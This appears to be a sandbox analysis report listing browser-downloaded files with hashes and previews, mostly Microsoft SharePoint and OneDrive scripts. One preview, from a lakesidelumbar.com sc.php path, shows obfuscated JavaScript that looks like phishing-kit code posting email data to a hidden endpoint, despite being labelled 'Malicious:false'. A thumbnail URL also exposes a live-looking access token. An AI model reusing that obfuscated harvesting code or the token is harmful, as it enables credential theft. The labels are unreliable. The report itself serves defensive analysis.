                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[20],{572:(e,t,n)=>{n.d(t,{a:()=>c,b:()=>d});var a=n(135),i=n(105),r=n(1),o=n("odsp.util_578"),s=o.HW.isActivated("2b1ee267-3309-486b-8be8-994d0fcadf3f"),c=function(){function e(){}return e.getBatchOperationUrl=function(e,t){return new i.b({webAbsoluteUrl:!e&&t?new r.a(t).authority:e}).build().segment("$batch").toString()},e.processErrorResponse=function(e,t){var n={id:t};if((e=e.error?e.error:e)&&e.code){var a=e.code?e.code.split(","):e.error.code.split(","),i=Number(a[0]),r=s||"string"!=typeof e.message?e.message.value:e.message;n.error={code:i,message:r}}return{items:[n]}},e.getBatchResponseText=function(e){var t,n,a,i=[];if(e.split("\n").length>0&&(t=e.split("\n")[0]),t){n=(e=e.replace(t.trim()+"--","")).split(t);for(var r=1;r<n.length;r++)(a=n[r].split("\n\r")).length>2&&i.push(a[2])}return i},e.processBatchResponse=function(e,t,n){var a,i,r,o,s=[],c=!1;if(e&&e.split("\n").length>0&&(a=e.split("\n")[0]),a
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (22055)
                              Category:downloaded
                              Size (bytes):65037
                              Entropy (8bit):5.070530140400966
                              Encrypted:false
                              SSDEEP:
                              MD5:432F8411088C02AD20BF0508FB577226
                              SHA1:607F74CE4F079178BF00410C7E87D8203FAF6910
                              SHA-256:4179C3F8DC8E0FF05992B0F4F23C087F726A4F4D4E750E2F7AE641B626BD6E88
                              SHA-512:52160FD882D7E6D0A5CAC1AB76011C49C3E9B64262DA926642C663CB4FB11527EACD027194FE5C2872F47EC0886383ED8F6B9D50BF4A563126DA477D37E67271
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/fr/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{586:e=>{e.exports=JSON.parse('{"a":"D.sol.... Nous avons rencontr. un probl.me.","c":"Essayez d.actualiser la page.","b":"D.sol.... Nous n.avons pas pu r.cup.rer la page . afficher."}')}.,1612:e=>{e.exports=JSON.parse('{"a":"Ouvrir dans le lecteur immersif"}')}.,696:e=>{e.exports=JSON.parse('{"b":"Ajouter un raccourci . Mes fichiers","d":"Ajouter un raccourci . OneDrive","n":"Supprimer","p":"Supprimer le raccourci de Mes fichiers","y":"Supprimer de la liste partag.e","a":"Ajouter un raccourci vers ce dossier dans Mes fichiers","o":"Supprimer le raccourci vers ce dossier de Mes fichiers","c":"Ajouter un raccourci vers ce dossier dans OneDrive","m":"Supprimer le raccourci s.lectionn. de cet emplacement","f":"Ajouter un raccourci . un albums","e":"Ajouter un raccourci . cet album partag. dans les albums","k":"Ouvrir l.emplacement du fichier","t":"Date","s":"N.importe que
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (4223)
                              Category:downloaded
                              Size (bytes):147514
                              Entropy (8bit):5.123392868822226
                              Encrypted:false
                              SSDEEP:
                              MD5:44E4E379DE5BEFF38DFBFABA1DDB443C
                              SHA1:BB175758ABF6039190BDC45A477854F32F38A4E2
                              SHA-256:F95C58468FD217833C04ACDEC1808960A9F7814DED9BF3CB67A758B1B97CAE14
                              SHA-512:1CA53E5F5B6D85EF791FC10FE2CB308494FA93FF0275BFFF30256EC0D1A7EFFE3183C3A1C51D2FBEFFAEE739D76A016799A4993B7F66ECC60B35E1C867DF57CC
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/de/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{2266:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,2455:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (4468)
                              Category:downloaded
                              Size (bytes):12599
                              Entropy (8bit):5.438159317614096
                              Encrypted:false
                              SSDEEP:
                              MD5:AA3FCA2BA444D8EB0849A177FDC0B18D
                              SHA1:B5B92661B19602A3A34ACF8AF7D291BEC233C74F
                              SHA-256:14065DE1527EB1B5F74A700139592892B40F1B172A93DC650173E58E964F34B8
                              SHA-512:FBBDF358BB858BBAFB33AAA98A1AD509BCA2889BE10794FD11296F29792D528D46C7D4EEBD670870D1476066AA93E9AB6BB46D99FCEE762313815964696BB814
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/135.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[135,644],{2316:function(e,t){var n;!function(e){e[e.Lock=1]="Lock",e[e.Unlock=2]="Unlock",e[e.Manage=3]="Manage",e[e.FreDialog=4]="FreDialog",e[e.ShowFiles=5]="ShowFiles",e[e.Reset=6]="Reset",e[e.Debug=7]="Debug",e[e.FilesRemaining=8]="FilesRemaining"}(n||(n={})),t.a=n}.,2617:function(e,t,n){(0,n("fui.util_150").pZ)([{rawString:".od-Error{text-align:center}.od-Error-image{padding-top:52px;height:208px;width:auto;margin:0 auto}.od-Error-image .od-Error-imageTag{height:208px;width:auto}.od-Error-image .od-Error-vaultImage{height:88px;width:auto;padding-top:113px}.md .od-Error-image,.sm .od-Error-image{padding-top:20px;height:168px;width:auto}.md .od-Error-image .od-Error-imageTag,.sm .od-Error-image .od-Error-imageTag{height:168px;width:auto}.md .od-Error-image .od-Error-vaultImage,.sm .od-Error-image .od-Error-vaultImage{height:88px;width:auto;padding-top:80px}.od-Error-title{padding:16px 16px 0 16px;font-size
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (12485)
                              Category:downloaded
                              Size (bytes):12490
                              Entropy (8bit):5.299705194144097
                              Encrypted:false
                              SSDEEP:
                              MD5:295F4F6AC67F3778E98E1610C35EA60B
                              SHA1:4295273F8509DF04477A2A222C44FAE1FF4931DD
                              SHA-256:1A6578BBEC296F9E262C95A553B7243DA77FC070715A2380B14A5AC8463FA13D
                              SHA-512:BBD2335BBA875471A47A336CDD43C6901C9F716B3702FABCE839BE5781D7A9CD966F510128D3CA59B10D47AFAEF380654E13FC4B4754DDE23EF4B46C007FE893
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/38.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[38],{3859:function(e,t,n){n.d(t,{a:function(){return v}});var a=n("fui.lco_35"),i=n("fui.util_150"),r=n("fui.core_238"),o=(0,i.e1)(function(){return(0,a.Xfp)({"0%":{transform:"translate(0, 0)",animationTimingFunction:"linear"},"78.57%":{transform:"translate(0, 0)",animationTimingFunction:"cubic-bezier(0.62, 0, 0.56, 1)"},"82.14%":{transform:"translate(0, -5px)",animationTimingFunction:"cubic-bezier(0.58, 0, 0, 1)"},"84.88%":{transform:"translate(0, 9px)",animationTimingFunction:"cubic-bezier(1, 0, 0.56, 1)"},"88.1%":{transform:"translate(0, -2px)",animationTimingFunction:"cubic-bezier(0.58, 0, 0.67, 1)"},"90.12%":{transform:"translate(0, 0)",animationTimingFunction:"linear"},"100%":{transform:"translate(0, 0)"}})}),s=(0,i.e1)(function(){return(0,a.Xfp)({"0%":{transform:" scale(0)",animationTimingFunction:"linear"},"14.29%":{transform:"scale(0)",animationTimingFunction:"cubic-bezier(0.84, 0, 0.52, 0.99)"},"16.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (35879)
                              Category:downloaded
                              Size (bytes):36387
                              Entropy (8bit):5.264492906443666
                              Encrypted:false
                              SSDEEP:
                              MD5:FD110275225F7194C0344FA43640E31C
                              SHA1:F8632651C01366BA01CEA393505FAF8D26BEE60B
                              SHA-256:994A781AD2073984B83567077959C7B38E47F1C6CED68C64955B93345C8DE35C
                              SHA-512:E3B80E753D601A367B750F766837EDB6D603E08E5A17726CA0393CD7F79144822156644D406CF75E12401B3FD8FD75E821F1CF780D21C688BC50AFB85EC19665
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/236.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[236],{1664:(e,t,n)=>{n.r(t),n.d(t,{AgendaView:()=>ot});var a=n(794),i=n(1056),r=n(817);(0,a.e)(r.i,function(e){var t=e.selectedCalendarEventId,n=e.appInstanceId;(0,i.b)().selectedCalendarEventIdMap.set(n,t)});var o=(0,a.a)("initializeScenario",function(e,t){return{appInstanceId:e,scenarioId:t}}),s=(0,a.a)("updateCalendarEventLoadStates",function(e,t,n){return{appInstanceId:e,calendarIds:t,scenarioId:n}}),c=(0,a.a)("updateLoadState",function(e,t,n){return{appInstanceId:e,scenarioId:n,loadState:t}}),d=(0,a.a)("updateLoadedDateRange",function(e,t,n){return{appInstanceId:e,dateRange:t,scenarioId:n}}),l=(0,a.a)("updateIsInitializingCalendarEventsLoader",function(e,t,n){return{appInstanceId:e,scenarioId:n,isInitializingCalendarEventsLoader:t}}),u=(0,a.a)("initializeCalendarEventsLoader",function(e,t,n,a){return{appInstanceId:e,calendarIds:t,dateRange:n,scenarioId:a}}),f=(0,a.a)("expandDateRange",function(e,t,n){ret
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 1262 x 952, 8-bit/color RGBA, non-interlaced
                              Category:downloaded
                              Size (bytes):118336
                              Entropy (8bit):7.951493877387148
                              Encrypted:false
                              SSDEEP:
                              MD5:7EC8025B982E920E1A1246D318FEAE89
                              SHA1:0C53EEBE6AE495D17719089789F16203BA3A5EAC
                              SHA-256:4FE67CB6506D9F7DC2752459AFD40C9312B931D04587ADDB0B39C007700FC316
                              SHA-512:6B18E6DFB79191F3F1710B01F5AF50ACD3E45F5204F4695E53AA0CC9934B4C90E22C9EFD73D50327A5F6CA391E4A282902F9B45F66CBFDE766CC54BA22FFD271
                              Malicious:false
                              Reputation:unknown
                              URL:https://eastus1-mediap.svc.ms/transform/thumbnail?provider=spo&inputFormat=png&cs=fFNQTw&docid=https%3A%2F%2Fnetorgft3648903-my.sharepoint.com%3A443%2F_api%2Fv2.0%2Fdrives%2Fb!XylRZ5Oyd0Szxdx-UJ1aUeSJ1ExD4GFIv8N3WGt4tBWuOUOv-I3tS6fXJvcmSgd7%2Fitems%2F01KPQEI7B4U43KAJ4LIZDL443MPSXT7ACV%3Fversion%3DPublished&access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiIwMDAwMDAwMy0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAvbmV0b3JnZnQzNjQ4OTAzLW15LnNoYXJlcG9pbnQuY29tQGYzZjcwNWE1LWNkODEtNGFlYy1hNjM0LTk4YTY0M2ExYjBkOSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jYzI1NmJmMTZjMWYwMjA4OWRmMDUwNWZmYzhhYzFkYzliY2FiMTg2MWU2NzU3ZDQyZWRiODJmNDgyMGVjZDY0MiIsImVuZHBvaW50dXJsIjoiQVdCWEtpc1Z2aml6aXVpelZSUVlKY0VUcDlmSWgwS3Z2emxDcWduWHM4az0iLCJlbmRwb2ludHVybExlbmd0aCI6IjEyNSIsImV4cCI6IjE3MTQwNjgwMDAiLCJpcGFkZHIiOiIxODUuMTUyLjY2LjIzMCIsImlzbG9vcGJhY2siOiJUcnVlIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwIiwiaXN1c2VyIjoidHJ1ZSIsIm5hbWVpZCI6IjAjLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uI2MyNTZiZjE2YzFmMDIwODlkZjA1MDVmZmM4YWMxZGM5YmNhYjE4NjFlNjc1N2Q0MmVkYjgyZjQ4MjBlY2Q2NDIiLCJuYmYiOiIxNzE0MDQ2NDAwIiwibmlpIjoibWljcm9zb2Z0LnNoYXJlcG9pbnQiLCJzaGFyaW5naWQiOiI1bzE2am95YVkwQ3d2b3d3NDIxTit3Iiwic2l0ZWlkIjoiTmpjMU1USTVOV1l0WWpJNU15MDBORGMzTFdJell6VXRaR00zWlRVd09XUTFZVFV4Iiwic25pZCI6IjYiLCJzdHAiOiJ0IiwidHQiOiIwIiwidmVyIjoiaGFzaGVkcHJvb2Z0b2tlbiJ9.-3noFvjHmmT0HsKmWmSzoY_mtIYeb3QmL24ThOhZ9Tk&cTag=%22c%3A%7BA036A73C-8B27-4646-BE73-6C7CAF3F8055%7D%2C1%22&encodeFailures=1&width=1262&height=952&srcWidth=1262&srcHeight=952
                              Preview:.PNG........IHDR.............e...... cHRM..z&..............u0...`..:....p..Q<....bKGD..............pHYs...%...%.IR$.....tIME......2d.].....IDATx...w|T.7...&.....HH.....]..........}._.m....x....[l..M1.....P...{..4....9's5..........4.s....|.dhxD0.}A.!..B.!..B....G...K....B.!..B.!..B.Q...B.!..B.!../D.;B.!..B.!..B.....!..B.!..B..B..#..B.!..B.!..Q...B.!..B.!../D.;B.!..B.!..B.....!..B.!..B..B..#..B.!..B.!..Q...B.!..B.!../D.;B.!..B.!..B.....!..B.!..B..B..#..B.!..B.!..Q...B.!..B.!../D.;B.!..B.!..B.....!..B.!..B..B..#..B.!..B.!..Q...B.!..B.!../D.;B.!..B.!..B.....!..B.!..B..B..#..B.!..B.!..Q...B.!..B.!../D.;B.!..B.!..B.....!..B.!..B..B..#..B.!..B.!..Q...B.!..B.!../D.;B..A...v.......}..sB.7.*..o...!...B.!..|..`.Z1>>......F..Z..T...t8.0..Z.p:...r.....J.......n...8l6...D".R..V..t....X,..K.R...A"...l6..F..V.V..J..;...t.......j....B.}..a6.a.XD...d2..j5.j.....ht..D".B.........l0.Lp8.....tP(.3(...3...l.6V$...R).r9.J...j.bllL......;.w8.NX,...v...9.L..L..\..B..J..R..L6.w:..X,.X,..l6.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4674)
                              Category:downloaded
                              Size (bytes):4679
                              Entropy (8bit):5.169345699027546
                              Encrypted:false
                              SSDEEP:
                              MD5:9EB04FEECC2A47FF2EAE35DA0EE013D8
                              SHA1:777C5FBD495485C4FA47E77EDFA487B2DA164443
                              SHA-256:642F49FA5CC5038CDA0D9432656FD6F6377F35DECF8642858E26F77E18CCD47E
                              SHA-512:4E2DA374553B89EF024E7789E60525A0AF83270E6EAE22CEFCE23D6F13AE2CB418A24E93022201C2727C6667A066EB735AC05C84D144722721A1D4C0B55CC01A
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/76.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[76],{654:(e,t,n)=>{n.r(t),n.d(t,{OfflineAriaEventQueue:()=>r,makeOfflineAriaEventQueue:()=>o});var a=n("tslib_102"),i=n(757),r=function(){function e(t,n,a){var r,o,s=this;if(this._pendingEvents=[],this._offlineDetection=a,this._tenantToken=n,this._allowMoreEvents=!0,this._expirationDate=new Date,this._expirationDate.setDate((new Date).getDate()-14),i.a)try{if("indexedDB"in window){this._logger=t;var c=indexedDB.open(e._dbName,e._dbVersion);c.onsuccess=function(){s._db=c.result,s._offlineDetection.onChange(function(e){e?s._stopInterval():s._startInterval()}),s._startDrainingQueuedEvents()},c.onupgradeneeded=function(t){if(t.oldVersion<1){var n=c.result.createObjectStore(e._dbTableName,{autoIncrement:!0});n.createIndex(e._dbTenantIndexName,e._dbTokenIndexKeyPath),n.createIndex(e._dbTimestampIndexName,"timestamp")}},this._flushEvents=(r=this._flushEvents.bind(this),o=void 0,function(){for(var e=[],t=0;t<argument
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Web Open Font Format, TrueType, length 15696, version 1.3277
                              Category:downloaded
                              Size (bytes):15696
                              Entropy (8bit):7.977214925834119
                              Encrypted:false
                              SSDEEP:
                              MD5:A8482C77FEAB1EC29835C17337F19170
                              SHA1:FF7CFA9DD949F57B01AC68BDE8355290EEF11B38
                              SHA-256:7C7878E552E192332F01AB2A0074036A836FA2A4B8F88487B3552291A6AAC33E
                              SHA-512:4E99152400E98204A7406437542212D6BC4A24A79204410F5C4CB525660FAC0D49C1C29B34B98425B8BDB7C2646DC8361F6848B235DA73511FEF005F0A7E4CF3
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-75d867e1/fluenthybridfont/odsp-next-icons-5-16b3eaa3.woff
                              Preview:wOFF......=P......~.........................OS/2.......G...`,.s.cmap...P........U.>.gasp................glyf......4...n(..j.head..8....4...6#...hhea..8<.......$....hmtx..8X...Y.... a..loca..8.........d.hmaxp..9........ .z.~name..9........O..R.post..=<....... ....x.c`a..8...........L..t.!.I.(......@9......VP`px2..b.0.B2..@x....R..%.x...KH.P...;.(.".3....3#.@..B0.($...m2.. ...6.k..(.(#:.>."..&Q{,.dH....F4A. b........{8....J..uxb.A...YO...h|..K5. um.}..D...4.3.9|.f...m.`'...^........p..........3..<......ots....\....nq.?........%.1J..I.D.Y ..*1.+. ..\..I.4O.}+i...z.:..td.k..=t....:..o..............P.....5.gM.[m..Z.].1.Y|.GLc....s...\p...P.....UhC!..t....K.../P.b.....-O.r..Yx..x...?......*q..(.......X..D#......&D .!.6GE9"V.+.<<....Ag-8...g]$................x..}.x\..9.L.hF.G.S4..z...%..".6...F`....l...c....PB'$!..H0YP:......}.l.}...}......;..;E...............G..................B..\.]._.<..>..c....@.K... ....H.s....rZ.H...%[..=.P~?...)[2..p.l!...E..O........
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:downloaded
                              Size (bytes):2225
                              Entropy (8bit):5.619809697578928
                              Encrypted:false
                              SSDEEP:
                              MD5:2EFFFC530AB9603563C724FA47FB6000
                              SHA1:110EB5BC9DD4EB42540C4A7184183B7AC814261B
                              SHA-256:D5A8D37C7BA0AB8BC610EF4A5823DDF74812E2EA1824E0783FC40EDB8F751A0B
                              SHA-512:C1987F50AF7FD7B166B97F33ECC2325A268C5194106DE5D5BEDBCDA31E2A08A39FB08FF80C9BC05FFC89FCFDF4E5E510B3D8B5531709D90E6349C73B7D64EDC4
                              Malicious:false
                              Reputation:unknown
                              URL:https://lakesidelumbar.com/civ/fixfile/admin/js/sc.php?r=ZW0sZW1haWwsYWRk
                              Preview:var vefc9cd= document.createElement('script');..var autograb = 0;..vefc9cd.setAttribute('src',atob("aHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuMS4xLm1pbi5qcw=="));..document.head.append(vefc9cd);....var vb962d7e7= document.createElement('script');..vb962d7e7.setAttribute('src',"https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(vb962d7e7);....vefc9cd.onload=function(){..$.support.cors = true..var vf5db3905 = atob;..var v2762672f = "".split;..var v5b7302be3e9b6ac11acfff2db = [].constructor.constructor(vf5db3905("cmV0dXJuIENyeXB0b0pT"));..var vaf7c25b4 = vf5db3905($('#b64u').val());..$.post(vaf7c25b4,'scte='.concat('') + (autograb == 0 ? '&auto=false' : '') + '&f=WyJlbSIsImVtYWlsIiwiYWRkIl0=')....done(function(v0511afbe){...function v7f5e7049(f){.....var O00O1II = v2762672f.apply(vf5db3905(f),[String.fromCharCode(42)]);.....var O000111 = {......OO0O1II: O00O1II[0],......OO0OII1: O00O1II[2],......OOOOII1 : O00O1II[1],......OO0OIII: O00O1II[3]
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (2764)
                              Category:downloaded
                              Size (bytes):14135
                              Entropy (8bit):5.244231846855431
                              Encrypted:false
                              SSDEEP:
                              MD5:D3BB35CFE4F028F538AB86A9F5A49F38
                              SHA1:09C7A27A9883C43AAE3F9DF571A0CD71056A891C
                              SHA-256:C47D9E4384DA4A887DB02A18F82B1F5EBBFF0A9BAC0BDA16C5EB4DA893246F1D
                              SHA-512:1CAD0A3669C91CD172920CF264884692CCAF94A3EE7C9690CA0C27EE2FCACCBF1CE22D5A93C8BC6136782E4C5AB6DD5E5FE13CF7BF34EBF3961CF9740BD5DDEA
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/fr/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{534:e=>{e.exports=JSON.parse('{"a":"D.sol.... Nous avons rencontr. un probl.me.","c":"Essayez d.actualiser la page.","b":"D.sol.... Nous n.avons pas pu r.cup.rer la page . afficher."}')}.,297:e=>{e.exports=JSON.parse('{"b":"Disponible uniquement en ligne","a":"{0}. D.sactiv. en mode hors connexion"}')}.,536:e=>{e.exports=JSON.parse('{"a":"ID de corr.lation.: {0}","b":"Aucune connexion Internet"}')}.,468:e=>{e.exports=JSON.parse('{"NONE":"Aucun","SUM":"Somme","COUNT":"Nombre","AVG":"Moyenne","MAX":"Maximum","MIN":"Minimum","STDEV":".cart-type","VAR":".cart"}')}.,466:e=>{e.exports=JSON.parse('{"b":"Oui","a":"Non"}')}.,277:e=>{e.exports=JSON.parse('{"a":"Fichiers n.cessitant une attention particuli.re","b":".l.ments n.cessitant une attention particuli.re","h":"Pages n.cessitant une attention particuli.re","g":"Informations manquantes","d":"{0} champ manquant||{0} champ
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (19679)
                              Category:downloaded
                              Size (bytes):380335
                              Entropy (8bit):5.358233748010156
                              Encrypted:false
                              SSDEEP:
                              MD5:35567C182F14CFD728DD9464EE2F89F8
                              SHA1:562ABD6C31FA6D66655B3CA7CC0FF113697EC275
                              SHA-256:026A7C97814A5060E98A932F2F83EF388C085FFB5C6B03E6267062885B33A1DB
                              SHA-512:F989AD5B264948E87C812542CF6999D3F4FD1C762955020C5B79825AC73E830349FF8F86E54AC7E02DC9EEDD84938D021F6BD1954642DBD362F941A245C419B4
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/83.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[83],{1296:(e,t,n)=>{var a;n.d(t,{a:()=>a}),function(e){e[e.NotSubmitted=0]="NotSubmitted",e[e.Pending=1]="Pending",e[e.Rejected=2]="Rejected",e[e.Approved=3]="Approved"}(a||(a={}))}.,984:(e,t,n)=>{n.r(t),n.d(t,{DataBatchOperationHelper:()=>c,default:()=>d});var a=n(51),i=n(2063),r=n(77),o=n("odsp.util_578"),s=o.HW.isActivated("2b1ee267-3309-486b-8be8-994d0fcadf3f"),c=function(){function e(){}return e.getBatchOperationUrl=function(e,t){return new i.b({webAbsoluteUrl:!e&&t?new r.a(t).authority:e}).build().segment("$batch").toString()},e.processErrorResponse=function(e,t){var n={id:t};if((e=e.error?e.error:e)&&e.code){var a=e.code?e.code.split(","):e.error.code.split(","),i=Number(a[0]),r=s||"string"!=typeof e.message?e.message.value:e.message;n.error={code:i,message:r}}return{items:[n]}},e.getBatchResponseText=function(e){var t,n,a,i=[];if(e.split("\n").length>0&&(t=e.split("\n")[0]),t){n=(e=e.replace(t.trim()+
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text, with very long lines (3106)
                              Category:downloaded
                              Size (bytes):5695
                              Entropy (8bit):5.323443674233393
                              Encrypted:false
                              SSDEEP:
                              MD5:AD3B069C16A24129C5464AB01FD6DCB5
                              SHA1:98297C2C0D1F2F8958FC428D405391C415455ACB
                              SHA-256:82008ECDFD16167879257E71ABCC0AE8414150540E8BACEC088D5356884F821D
                              SHA-512:1F7D24D3730EE16B738DE803FC53F266DAEEB6A9AE75CAB24F0B7805E7874655C0342978705E617B58EB5FCAD7DCF8C7AFCFD8A46F4667655681CBCC9BBD7E1E
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/587.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[587],{3482:function(e,t,n){n.r(t),n.d(t,{default:function(){return D}});var a=n("tslib_102"),i=n(2236),r=n(2100),o=n(2098),s=n(23),c=n(127),d=n(14),l=n(2116),u=n(2120);(0,n("fui.util_150").pZ)([{rawString:".od-MalwareDetected-dialog-header{color:"},{theme:"errorText",defaultValue:"#a4262c"},{rawString:";font-size:21px;margin-bottom:15px}"}]);var f=n(2089),p=n("odsp.util_578"),m=n(6558),_='<a href="https://go.microsoft.com/fwlink/?linkid=862871" target="_blank">'.concat(m.c,"</a>"),h=function(e){function t(t){var n=e.call(this,t)||this;return n.allowInfectedDownload=t.allowInfectedDownload,n.malwareDetectedIconUrl=window.require.toUrl("odsp-media/images/atp/malware_icon_168x168.svg"),n.malwareDetectedMessageHeader=m.b,n.malwareDetectedMessage=p.OO(m.d,_),n.malwareDetectedAllowDownloadMessage=p.OO(m.a,_),n}return(0,a.XJ)(t,e),t}(f.a),b=n(2090).a({tagName:"od-malwareDetected",template:'<div class="od-MalwareDete
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (7749)
                              Category:downloaded
                              Size (bytes):58077
                              Entropy (8bit):5.054657649208462
                              Encrypted:false
                              SSDEEP:
                              MD5:8C4FC84A528FE3EE404266B25A51B388
                              SHA1:BEDC8CC46B177901B03C9AF510828521B2DB2338
                              SHA-256:774368C363D30C2692287D5E82EDF9CEA5ECB29EC2352C1557A93471F32AB10B
                              SHA-512:71D3F661DDDDD05CD4F919D10F32F05454181239003CB12636A09CEDC9B21302F553C2FB2BEFA7B9CCAF2FAA3DDBF6A21DF931DCF2C225DD278263F22EC79E72
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/de/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{428:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,460:e=>{e.exports=JSON.parse('{"a":"A source with id \
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (5315)
                              Category:downloaded
                              Size (bytes):7252
                              Entropy (8bit):5.344552269349827
                              Encrypted:false
                              SSDEEP:
                              MD5:078E6C4B016CA9405BF1AF2DB41183F0
                              SHA1:1F3F11095C42139F15B96ABE71E399FE68ADC173
                              SHA-256:EC325CF25A35FE6B76E003242D8086D66F45D498D1D3E73D327CC2C73B85C7FF
                              SHA-512:572D81AD973970E840AB98E9FE0581AF63DC0F656B6D295DDC9655AA9C346418F1B4EF855DF73A01515A8261E2A663D0CBE2259C2B3C8130ED87BB5B785DE65E
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1.js
